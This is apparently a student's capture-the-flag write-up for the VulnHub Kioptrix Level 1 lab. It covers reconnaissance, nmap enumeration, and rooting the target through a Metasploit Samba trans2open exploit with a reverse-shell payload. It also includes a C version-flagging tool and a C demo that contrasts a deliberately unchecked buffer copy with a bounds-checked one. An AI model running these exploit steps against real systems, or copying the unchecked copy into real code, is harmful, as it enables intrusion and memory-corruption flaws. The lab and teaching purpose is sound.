June 6, 2026
Kioptrix Level 1 — VulnHub Writeup
By Mohamed Khalil | Cybersecurity Student, East Tennessee State University
Overview
Goal: Gain root access
Result: Rooted via Samba trans2open buffer overflow
Environment Setup
- Attack Machine: Kali Linux 2025.3 (VirtualBox)
- Target Machine: Kioptrix Level 1 (VirtualBox)
- Network: VirtualBox Host-Only Adapter (isolated lab environment)
Step 1: Reconnaissance — Finding the Target
With both VMs running on the same Host-Only network, I used arp-scan to discover the target IP:
sudo arp-scan -l
Result: Kioptrix was running at 192.168.1.104
Step 2: Enumeration — Service and Version Scanning
I ran an nmap scan to identify open ports and service versions:
nmap -sV 192.168.1.104
Results:
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp    open  http        Apache httpd 1.3.20 mod_ssl/2.8.4 OpenSSL/0.9.6b
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 mod_ssl/2.8.4 OpenSSL/0.9.6b
32768/tcp open  status      1 (RPC #100024)
Key findings:
- Apache 1.3.20 with mod_ssl 2.8.4 — known vulnerable to OpenFuck exploit
- Samba running on port 139 — known vulnerable to trans2open buffer overflow
- OpenSSH 2.9p2 — very old version
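The two findings that drove this box (an old mod_ssl and a Samba service with no version banner) can be turned into a repeatable check so the same rules run over every scan instead of being eyeballed. The C program below is an added example written for this write-up; it is not part of the original post and not an nmap feature. It embeds the nmap -sV lines from the scan as a constructed sample, parses the VERSION column, and flags a line when mod_ssl is older than 2.8.7 (the cutoff the searchsploit result names) or when Samba reports no version at all, so the trans2open-affected 2.0.x to 2.2.x range cannot be ruled out from the banner. The function names and the dotted-version comparison are assumptions introduced for the example; OpenSSH is left unflagged because the write-up calls it old but gives no cutoff.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Parse up to four dotted numeric components ("2.8.4" -> 2,8,4,0).
 * Parsing stops at the first character that is neither digit nor dot,
 * so "2.9p2" reads as 2.9. Returns the number of components found. */
static int parse_version(const char *s, long out[4]) {
    int n = 0;
    for (int i = 0; i < 4; i++) out[i] = 0;
    while (n < 4 && isdigit((unsigned char)*s)) {
        long v = 0;
        while (isdigit((unsigned char)*s)) v = v * 10 + (*s++ - '0');
        out[n++] = v;
        if (*s != '.') break;
        s++;
    }
    return n;
}

/* Compare two dotted versions numerically: <0, 0 or >0, like strcmp. */
int version_cmp(const char *a, const char *b) {
    long va[4], vb[4];
    parse_version(a, va);
    parse_version(b, vb);
    for (int i = 0; i < 4; i++)
        if (va[i] != vb[i]) return va[i] < vb[i] ? -1 : 1;
    return 0;
}

/* Return the VERSION column: everything after PORT, STATE and SERVICE. */
static const char *version_field(const char *line) {
    const char *p = line;
    for (int col = 0; col < 3; col++) {
        while (*p && !isspace((unsigned char)*p)) p++;
        while (*p && isspace((unsigned char)*p)) p++;
    }
    return p;
}

/* True if the text contains something like "1.3" (digit, dot, digit). */
static int has_dotted_number(const char *s) {
    for (; s[0] && s[1] && s[2]; s++)
        if (isdigit((unsigned char)s[0]) && s[1] == '.' && isdigit((unsigned char)s[2]))
            return 1;
    return 0;
}

/* Apply the two rules the write-up's findings rest on. Returns 1 and writes
 * a reason when the service needs version research, 0 otherwise. */
int flag_line(const char *line, char *reason, size_t reason_cap) {
    const char *vf = version_field(line);
    const char *m = strstr(vf, "mod_ssl/");
    if (m && version_cmp(m + strlen("mod_ssl/"), "2.8.7") < 0) {
        snprintf(reason, reason_cap, "mod_ssl older than 2.8.7 (OpenFuck range from searchsploit)");
        return 1;
    }
    if (strstr(vf, "Samba") && !has_dotted_number(vf)) {
        snprintf(reason, reason_cap, "Samba without a version banner; 2.0.x-2.2.x (trans2open) not ruled out");
        return 1;
    }
    if (reason_cap) reason[0] = '\0';
    return 0;
}

/* Same check without an output buffer, convenient for tests. */
int is_flagged(const char *line) {
    char reason[160];
    return flag_line(line, reason, sizeof reason);
}

/* Constructed sample: the nmap -sV output lines from this write-up's scan. */
static const char *const SAMPLE_SCAN[] = {
    "22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)",
    "80/tcp open http Apache httpd 1.3.20 mod_ssl/2.8.4 OpenSSL/0.9.6b",
    "111/tcp open rpcbind 2 (RPC #100000)",
    "139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)",
    "443/tcp open ssl/https Apache/1.3.20 mod_ssl/2.8.4 OpenSSL/0.9.6b",
    "32768/tcp open status 1 (RPC #100024)",
};
#define SAMPLE_COUNT (sizeof SAMPLE_SCAN / sizeof SAMPLE_SCAN[0])

/* Run the rules over the sample scan, print hits, return how many were flagged. */
int count_flagged_sample(void) {
    int hits = 0;
    char reason[160];
    for (size_t i = 0; i < SAMPLE_COUNT; i++) {
        if (flag_line(SAMPLE_SCAN[i], reason, sizeof reason)) {
            printf("FLAG %s\n     %s\n", SAMPLE_SCAN[i], reason);
            hits++;
        }
    }
    return hits;
}

int main(void) {
    printf("%d of %zu services need version research\n", count_flagged_sample(), SAMPLE_COUNT);
    return 0;
}
```

On the sample scan this flags ports 80, 443 (mod_ssl/2.8.4) and 139 (Samba with no version), which is exactly the list a defender would want on an asset inventory before an attacker runs the same nmap command.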
Step 3: Vulnerability Research
I used searchsploit to look up known exploits for the identified services:
searchsploit mod_ssl 2.8
searchsploit samba 2.2
mod_ssl results:
- Apache mod_ssl < 2.8.7 OpenSSL — 'OpenFuck' (Remote exploit)
Samba results (via Metasploit):
search trans2open
exploit/linux/samba/trans2open — Samba trans2open Overflow (Linux x86) — Rank: Great
I chose the Samba trans2open route via Metasploit as the primary attack path due to its "great" reliability rating.
Step 4: Exploitation via Samba trans2open
What is this vulnerability?
The Samba trans2open vulnerability is a buffer overflow in Samba versions 2.0.x through 2.2.x. By sending a malformed trans2open request, an attacker can overflow a buffer and overwrite the return address, redirecting code execution to a malicious payload. Since Samba was running as root, successful exploitation gives immediate root access.
Exploitation steps:
msfconsole
use exploit/linux/samba/trans2open
set RHOSTS 192.168.1.104
set payload linux/x86/shell/reverse_tcp
run
Result:
[*] Command shell session 1 opened (192.168.1.244:4444 → 192.168.1.104:32769)
Four shell sessions opened successfully.
Step 5: Post-Exploitation — Confirming Root
Inside the shell session I ran:
whoami
root
id
uid=0(root) gid=0(root) groups=99(nobody)
uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
Root access confirmed on Linux kernel 2.4.7, a Red Hat system from 2001.
Summary
Phase              Tool Used                  Finding
Discovery          arp-scan                   Target at 192.168.1.104
Enumeration        nmap -sV                   Apache 1.3.20, Samba, OpenSSH 2.9p2
Research           searchsploit, msfconsole   trans2open buffer overflow
Exploitation       Metasploit                 Shell session opened
Post-Exploitation  whoami, id, uname          Confirmed root
What I Learned
The vulnerability: Samba's trans2open function did not properly validate the size of incoming data before copying it into a fixed-size buffer. This allowed an attacker to overflow the buffer and overwrite the stack, redirecting execution to arbitrary shellcode.
Why it worked: The service was running as root, meaning any code we injected ran with full system privileges. There were no modern protections (ASLR, DEP, stack canaries) present on this 2001-era system.
How it would be patched: Update Samba to a version beyond 2.2.x. Apply the principle of least privilege; services should not run as root unless absolutely necessary. Enable modern memory protections.
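The root cause described in Step 4 and restated here is a copy whose size comes from the request rather than from the destination buffer. The C program below is an added example for this write-up, not Samba's code and not the real SMB trans2 packet layout: it uses a constructed toy request (a 2-byte length header followed by data) to show the unchecked copy next to the hardened one. The hardened version applies the two checks that were missing: the claimed length must be covered by the bytes actually received, and it must fit the fixed-size destination. The unchecked version is kept for contrast and is only ever run on a well-formed request; all names and sizes are assumptions introduced for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Constructed toy request format: a 2-byte big-endian length header followed
 * by the data. Not the real SMB trans2 layout; it only reproduces the shape of
 * the bug: a client-controlled length next to a copy into a fixed buffer. */
#define HDR_LEN 2
#define REPLY_CAP 64   /* fixed-size destination, as in the pattern the write-up describes */

static uint16_t read_be16(const unsigned char *p) {
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* VULNERABLE pattern: the length from the header is trusted and used directly
 * as the copy size. A length larger than REPLY_CAP writes past the end of dst,
 * which is the overflow mechanism the write-up describes. Kept for contrast;
 * only ever called on well-formed input in this program. */
int copy_unchecked(const unsigned char *pkt, size_t pkt_len, char *dst) {
    if (pkt_len < HDR_LEN) return -1;
    uint16_t claimed = read_be16(pkt);
    memcpy(dst, pkt + HDR_LEN, claimed);   /* no comparison against REPLY_CAP or pkt_len */
    return claimed;
}

/* HARDENED: the claimed length must be covered by the bytes actually received
 * and must leave room in the destination (including a terminator). */
int copy_checked(const unsigned char *pkt, size_t pkt_len, char *dst, size_t dst_cap) {
    if (pkt_len < HDR_LEN || dst_cap == 0) return -1;
    uint16_t claimed = read_be16(pkt);
    if ((size_t)claimed > pkt_len - HDR_LEN) return -1;  /* header claims more than was sent */
    if ((size_t)claimed >= dst_cap) return -1;           /* would not fit the fixed buffer */
    memcpy(dst, pkt + HDR_LEN, claimed);
    dst[claimed] = '\0';
    return claimed;
}

/* Build a packet: header carrying `claimed`, then `payload_len` bytes of payload.
 * The two are independent on purpose so a lying header can be constructed. */
size_t build_packet(unsigned char *buf, size_t buf_cap, uint16_t claimed,
                    const char *payload, size_t payload_len) {
    if (buf_cap < HDR_LEN + payload_len) return 0;
    buf[0] = (unsigned char)(claimed >> 8);
    buf[1] = (unsigned char)(claimed & 0xff);
    memcpy(buf + HDR_LEN, payload, payload_len);
    return HDR_LEN + payload_len;
}

/* Scenario 1: honest request, 5 bytes claimed and 5 sent. Returns the checked
 * copy's result, or -2 if the copied text does not match what was sent. */
int scenario_honest(void) {
    unsigned char pkt[128];
    char reply[REPLY_CAP];
    size_t n = build_packet(pkt, sizeof pkt, 5, "hello", 5);
    int rc = copy_checked(pkt, n, reply, sizeof reply);
    if (rc == 5 && strcmp(reply, "hello") != 0) return -2;
    return rc;
}

/* Scenario 2: header claims 1000 bytes but only 5 were sent. */
int scenario_lying_header(void) {
    unsigned char pkt[128];
    char reply[REPLY_CAP];
    size_t n = build_packet(pkt, sizeof pkt, 1000, "hello", 5);
    return copy_checked(pkt, n, reply, sizeof reply);
}

/* Scenario 3: 100 bytes really sent. Whether the copy is accepted depends only
 * on the destination capacity, so it is a parameter (capped at 128 here). */
int scenario_oversized(size_t dst_cap) {
    unsigned char pkt[128];
    char reply[128];
    char big[100];
    memset(big, 'A', sizeof big);
    size_t n = build_packet(pkt, sizeof pkt, 100, big, sizeof big);
    return copy_checked(pkt, n, reply, dst_cap > sizeof reply ? sizeof reply : dst_cap);
}

int main(void) {
    unsigned char pkt[128];
    char reply[REPLY_CAP];
    size_t n = build_packet(pkt, sizeof pkt, 5, "hello", 5);
    printf("honest request: unchecked=%d checked=%d\n",
           copy_unchecked(pkt, n, reply), scenario_honest());
    printf("lying header:   checked=%d (unchecked copy deliberately not run)\n",
           scenario_lying_header());
    printf("100-byte body:  checked into 64=%d, into 128=%d\n",
           scenario_oversized(REPLY_CAP), scenario_oversized(128));
    return 0;
}
```

The second check (claimed length against bytes received) is the one most often forgotten: a length field is attacker data until it has been compared with what actually arrived on the wire. The third scenario also shows why least privilege matters independently of the fix: the overflow is the same size whether the daemon runs as root or as an unprivileged user, but only in the first case does a single bad length turn into uid 0.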
Key takeaway: Version enumeration is everything. The moment nmap returned Samba on port 139 with no version number, the next step was clear: research that service. Old software versions are low-hanging fruit in real engagements.
All testing was performed in an isolated lab environment.
Mohamed Khalil | Cybersecurity Student | East Tennessee State University | www.linkedin.com/in/khalilm1 | https://github.com/asimisbest